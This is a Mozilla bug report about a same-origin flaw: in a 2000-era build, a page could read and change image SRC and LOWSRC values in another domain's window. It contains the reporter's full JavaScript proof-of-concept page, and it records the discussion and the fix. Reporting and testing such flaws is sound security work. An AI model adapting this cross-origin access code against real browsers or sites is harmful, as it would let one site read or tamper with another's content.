Closed Bug 41230 Opened 24 years ago Closed 24 years ago

image SRC and LOWSRC are not checked for same origin as all.js said

Categories

(Core :: Security, defect, P3)

Product:
Core
Component:
Security
Platform:
x86
All
Type:
defect

Tracking

()

Status:
VERIFIED FIXED

People

(Reporter: czhang, Assigned: security-bugs)

References

(
URL
)

Details

(Whiteboard: [nsbeta2+])

load 6/01 build 1. go to http://cathyz/origin/image.html 2. click "hack image src" 3. wait for a while, see the src of image of another domain, and you are also able to change the src of the image. the code is: ---------------http://cathyz/origin/image.html-------------------------<html> <head> <script> var newin; function getSrc() { newin=window.open("http://cathyz2/sameori/image.html","newinow"); setTimeout("document.F1.T1.value='SRC value is ' + newin.document.images[0].s rc;", 6000); setTimeout("document.F1.T2.value='LOWSRC value is ' + newin.document.images[0 ].lowsrc;", 6000); setTimeout("newin.document.images[0].src='http://cathyz2/images/lowstar.gif' ;", 7000); setTimeout("newin.document.images[0].lowsrc='http://cathyz2/images/highstar.g if';", 7000); } </script> </head> <body> <a href=javascript:void(0) onClick="getSrc()"> hack src of image</a> <form name="F1"> <input type=text size=50 name="T1"> <br> <input type=text size=50 name="T2"> </form> </body> </html>
ok.. so you shouldn't be able to work with .src of an image in a window from a different domain. should you be able to do _anything_ with images in window from another domain -- even find out how many there are?
No. You are correct, Jesse.
Was bug 39083 somehow fixed without fixing this? It seems to me that they were the same bug (able to access document.images across domains), but mstoltz's 05/26/2000 16:28 checkin comments imply that bug 39083 was about innerHTML. Since I'm not that experienced with DOM (especially cross-window), I'm probably missing something fairly obvious.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Assigning QA to czhang
Hmm, we do have a check for htmlimageelement.src and .lowsrc, but that check doesn't seem to be happening here. I'm not sure why. Changing all properties to sameOrigin by default would fix this, but there may be a more localized solution if necessary. Marking as dependent on the safe-default bug, and nominating nsbeta2.
Status: NEW → ASSIGNED
Depends on: 28443
Keywords: nsbeta2
Target Milestone: --- → M17
nsbeta2+
Whiteboard: [nsbeta2+]
Fixed.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
verified
Status: RESOLVED → VERIFIED
Flags: testcase+
Flags: in-testsuite+ → in-testsuite?
You need to log in before you can comment on or make changes to this bug.